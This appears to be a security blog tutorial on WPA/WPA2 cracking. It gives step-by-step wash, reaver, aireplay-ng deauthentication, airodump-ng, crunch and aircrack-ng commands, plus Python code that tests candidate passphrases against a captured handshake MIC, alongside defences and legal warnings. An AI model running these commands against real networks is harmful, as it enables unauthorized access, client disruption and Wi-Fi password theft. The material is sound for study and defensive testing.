WPA and WPA2 Cracking: Understanding WPS Vulnerabilities and Handshake Attacks

Published on September 8, 2025 • 18 min read

In our previous article, we explored Wi-Fi deauthentication attacks and their role in ethical hacking. Today, we'll dive deeper into wireless security by examining WPA and WPA2 cracking techniques, with a special focus on WPS (Wi-Fi Protected Setup) vulnerabilities and handshake attacks.

WPA (Wi-Fi Protected Access) and its successor WPA2 are the most common security protocols used to protect wireless networks. While they offer significant improvements over the deprecated WEP standard, they're not impervious to attacks—especially when combined with vulnerable features like WPS.

Understanding WPS and Its Vulnerabilities

WPS (Wi-Fi Protected Setup) is a network security standard designed to simplify the process of connecting devices to a wireless network. Instead of requiring users to enter a long, complex password, WPS allows a device to join through alternative methods, such as entering an 8-digit PIN or pressing a button on the router (PBC).

The PIN method is particularly interesting from a security perspective because it introduces a critical vulnerability. An 8-digit PIN provides only 10^8 (100,000,000) possible combinations. While this might seem large, the WPS authentication process divides the PIN into two halves, effectively reducing the number of required guesses to just 11,000 (10^4 + 10^3).

WPS PIN Vulnerability Explained:

The WPS PIN is validated in two segments: the first 4 digits and the last 3 digits (the 8th digit is a checksum). This design flaw allows attackers to brute-force each segment separately, dramatically reducing the time required to crack the PIN from years to just hours.
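The checksum rule behind the 8th digit, and the guess counts it leaves, as an added Python illustration (not code from the article); the digit weighting follows the Wi-Fi Simple Configuration specification, and the PIN 12345670 from the article's Reaver output is used as the sample:

```python
# Added example, not from the article: WPS PIN checksum and search-space arithmetic.

def wps_checksum(first_seven: int) -> int:
    """Weighted mod-10 checksum over the first 7 digits (weights 3,1,3,1,3,1,3)."""
    acc = 0
    for i in range(7):
        digit = (first_seven // 10 ** (6 - i)) % 10
        acc += 3 * digit if i % 2 == 0 else digit
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def guesses_naive() -> int:
    """Guesses if the whole 8-digit PIN were validated at once."""
    return 10 ** 8


def guesses_split() -> int:
    """Guesses when each half is confirmed separately: 4 free digits, then 3 (the 8th is derived)."""
    return 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"))          # the article's sample PIN has a valid checksum
    print(guesses_naive(), guesses_split())      # 100000000 vs 11000
```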

WPS Attack Methodology

Before attempting a WPS attack, it's crucial to verify that the target network has WPS enabled and is vulnerable. This attack will only work if:

  1. The router has WPS enabled
  2. The router is not using PBC (Push Button Configuration) exclusively
  3. The router doesn't implement WPS lockout after failed attempts

Step 1: Scanning for WPS-Enabled Networks

We use the wash tool to scan for networks with WPS enabled:

root@kali:~# wash --interface wlan0
BSSID              Ch  dBm  WPS  Lck  Vendor   ESSID
--------------------------------------------------------------------------------
84:D8:1B:BF:71:2E   1  -31  2.0  No   NetGear  wifi_name_lorem_2.4GHz

In this output, wash reports the access point's BSSID (84:D8:1B:BF:71:2E), its channel (1), the signal strength (-31 dBm), the WPS version (2.0), the WPS lock status, the vendor (NetGear) and the ESSID (wifi_name_lorem_2.4GHz).

The "Lck: No" status indicates that the router's WPS is not locked, making it vulnerable to brute-force attacks.

Step 2: Brute-Forcing the WPS PIN

With our target identified, we use reaver to brute-force the WPS PIN:

root@kali:~# reaver --bssid 84:D8:1B:BF:71:2E --channel 1 --interface wlan0

Reaver will systematically try different PIN combinations. During this process, it may need to re-authenticate with the access point, which can be done using aireplay-ng:

root@kali:~# aireplay-ng --fakeauth 30 -a 84:D8:1B:BF:71:2E -h 6C:60:EB:C7:51:A2 wlan0

In this command, --fakeauth 30 performs a fake authentication with the access point and repeats it every 30 seconds to keep the association alive, -a gives the access point's BSSID, and -h gives the MAC address of our own wireless card.

Step 3: Retrieving the Network Credentials

Once Reaver successfully cracks the WPS PIN, it will display both the PIN and the network's PSK (Pre-Shared Key), which is the actual Wi-Fi password:

[+] WPS PIN: '12345670'
[+] WPA PSK: 'MySecureWiFiPassword123'
[+] AP SSID: 'wifi_name_lorem_2.4GHz'

Important Note:

Many modern routers implement WPS lockout mechanisms that temporarily disable WPS after several failed PIN attempts. Some routers may even permanently lock WPS, requiring a factory reset. Always test on your own equipment or with explicit permission.

Handshake Attacks: When WPS Is Disabled

If WPS is disabled on the target network, we need to resort to handshake attacks. This method involves capturing the cryptographic handshake that occurs when a device connects to a WPA/WPA2-protected network.

Understanding the Four-Way Handshake

The four-way handshake is a process that establishes a secure connection between a client and an access point in WPA/WPA2 networks. It serves two main purposes:

  1. Confirming that both parties know the Pre-Shared Key (PSK)
  2. Deriving fresh encryption keys for the session

The handshake consists of four messages exchanged between the access point (authenticator) and the client (supplicant):

Four-Way Handshake Process:

  1. AP → Client: Sends ANonce (AP Nonce)
  2. Client → AP: Sends SNonce (Client Nonce) and MIC (Message Integrity Code)
  3. AP → Client: Sends GTK (Group Temporal Key) and MIC
  4. Client → AP: Confirmation message

Step 1: Capturing the Handshake

We use airodump-ng to capture packets from the target network:

root@kali:~# airodump-ng --bssid 84:D8:1B:BF:71:2E --channel 1 --write wpahandshake wlan0

This command restricts the capture to the target access point (--bssid), locks the card to channel 1 (--channel) and writes the captured packets to files prefixed wpahandshake (--write), which is where the wpahandshake-01.cap file used in the cracking step comes from.

At this point, we need to wait for a client to connect to the network naturally, or we can force a reconnection using a deauthentication attack.

Step 2: Triggering a Handshake with Deauthentication

Instead of waiting for a client to connect, we can force an existing client to reconnect by sending deauthentication packets:

root@kali:~# aireplay-ng --deauth 4 -a 84:D8:1B:BF:71:2E -c 8C:85:90:65:EC:F5 wlan0

This command sends 4 deauthentication packets to disconnect the specified client, which will then automatically attempt to reconnect, generating a new handshake that we can capture.

When a handshake is successfully captured, airodump-ng will display "[ WPA handshake: ... ]" in the top-right corner of the interface.

Step 3: Creating a Wordlist

With the handshake captured, we need to attempt to crack the password using a wordlist. We can generate custom wordlists using tools like crunch:

root@kali:~# crunch 6 8 123abc$ -o wordlist.txt -t a@@@@@b

This command generates passwords matching the pattern a@@@@@b: a fixed leading 'a', a fixed trailing 'b', and each '@' position filled with one character from the set 123abc$. The result is written to wordlist.txt (-o).

Step 4: Cracking the Handshake

Now we use aircrack-ng to attempt to crack the password by testing each word in our list against the captured handshake:

root@kali:~# aircrack-ng wpahandshake-01.cap -w wordlist.txt

If successful, aircrack-ng will display "KEY FOUND!" followed by the network password.

The Technical Details: How Handshake Cracking Works

Understanding the technical process behind handshake cracking helps explain why it's effective:

When we capture a handshake, we obtain the AP and client MAC addresses, the ANonce and SNonce, the MIC sent by the client, and the network's SSID; in other words, everything except the password itself.

The critical insight is that the MIC is calculated using all the other elements plus the password. Since we have all the elements except the password, we can:

  1. Take a password candidate from our wordlist
  2. Combine it with the other handshake elements (AP MAC, Client MAC, etc.)
  3. Calculate what the MIC should be if this were the correct password
  4. Compare our calculated MIC with the captured MIC
  5. If they match, we've found the correct password

This process allows us to test passwords offline, without further interaction with the network, making it difficult to detect.
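The derivation chain behind the five steps above, as an added Python example that is not part of the article and not aircrack-ng's code; it also shows how the nonces from the four-way handshake section enter the key derivation. The SSID, BSSID, client MAC and PSK are taken from the article's own output; the nonces, the EAPOL message-2 frame and the "captured" MIC are constructed here so the block runs offline.

```python
import hashlib
import hmac

# Added example, not code from the article or from aircrack-ng. SSID and MACs come
# from the article's output; nonces, EAPOL frame and "captured" MIC are constructed.
SSID = "wifi_name_lorem_2.4GHz"
AP_MAC = bytes.fromhex("84D81BBF712E")       # BSSID from the wash output
CLIENT_MAC = bytes.fromhex("8C859065ECF5")   # client MAC from the deauth step
ANONCE = bytes(range(32))                    # constructed AP nonce (message 1)
SNONCE = bytes(range(32, 64))                # constructed client nonce (message 2)
# Constructed 99-byte EAPOL-Key frame of message 2: header, descriptor type, key info
# 0x010a, key length, replay counter, SNonce, IV/RSC/ID, zeroed MIC field, key data length.
EAPOL_M2 = (bytes.fromhex("0103005f02010a0000") + b"\x00" * 7 + b"\x01"
            + SNONCE + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits): the costly step per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK via the 802.11i PRF-512: four HMAC-SHA1 blocks keyed with the PMK."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key descriptor version 2: first 16 bytes of HMAC-SHA1 over the MIC-zeroed frame."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]

def mic_for_candidate(passphrase: str) -> bytes:
    """Steps 1-3 of the article: candidate -> PMK -> PTK -> MIC (the KCK is the PTK's first 16 bytes)."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_M2)

def find_passphrase(candidates, captured_mic: bytes):
    """Steps 4-5: compare each candidate's MIC with the captured one; None if the list misses it."""
    for cand in candidates:
        if hmac.compare_digest(mic_for_candidate(cand), captured_mic):
            return cand
    return None

if __name__ == "__main__":
    # Stand-in for the MIC read from wpahandshake-01.cap: derived here from the article's PSK.
    captured = mic_for_candidate("MySecureWiFiPassword123")
    print(find_passphrase(["password123", "letmein"], captured))                  # None: not in the list
    print(find_passphrase(["password123", "MySecureWiFiPassword123"], captured))  # the PSK
```

The PBKDF2 step is what makes every guess cost 4096 HMAC rounds, and the wordlist only succeeds when the passphrase is in it, which is why a long passphrase that is not wordlist-derived is the practical defence.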

Protection Against WPA/WPA2 Attacks

Now that we understand how these attacks work, let's explore effective defense strategies:

Protection Method       Explanation                                                 Effectiveness
----------------------  ----------------------------------------------------------  ----------------------------------
Disable WPS             Completely turn off WPS functionality on your router        High (against WPS attacks)
Use WPA3                Upgrade to WPA3, which provides stronger protection         High
Strong Passwords        Use long, complex passwords (15+ characters with variety)   High (against handshake attacks)
Implement WPS Lockout   Configure routers to lock WPS after failed attempts         Medium
MAC Address Filtering   Restrict network access to specific device MAC addresses    Low (MAC addresses can be spoofed)
Network Monitoring      Use intrusion detection systems to spot attack patterns     Medium

Best Practices for Wireless Security:

  • Disable WPS on all routers (it's often enabled by default)
  • Use WPA3 if available, or WPA2 with AES encryption
  • Create passwords with at least 15 characters, including uppercase, lowercase, numbers, and symbols
  • Regularly update router firmware to patch vulnerabilities
  • Monitor network logs for unusual authentication patterns
  • Consider using enterprise-grade authentication (WPA-Enterprise) for business networks

Legal and Ethical Considerations

Warning: Performing these attacks on networks you don't own or without explicit permission is illegal in most jurisdictions. This information is provided for educational purposes only.

Ethical hackers use these techniques for:

Always obtain written permission before testing any network security measures. Document your activities thoroughly and follow responsible disclosure practices if vulnerabilities are discovered.

Conclusion

WPA and WPA2 cracking techniques, particularly those exploiting WPS vulnerabilities and capturing handshakes, demonstrate the importance of robust wireless security practices. While these protocols represent significant improvements over earlier standards, they're not foolproof—especially when combined with convenience features like WPS.

Understanding these attack vectors is crucial for both security professionals tasked with protecting networks and ethical hackers performing authorized penetration tests. As wireless technologies continue to evolve with standards like WPA3, we can expect improved security, but the fundamental principles of strong passwords, regular updates, and disabling unnecessary features will remain relevant.

Key Takeaways:

  • WPS introduces a significant vulnerability due to its 8-digit PIN authentication
  • Handshake attacks allow offline password cracking without further network interaction
  • Strong, complex passwords are the best defense against handshake attacks
  • Disabling WPS is the most effective protection against WPS-based attacks
  • Always obtain proper authorization before testing network security
  • WPA3 offers improved security and should be used when available

By understanding both the offensive techniques and defensive strategies, we can work toward more secure wireless networks in an increasingly connected world.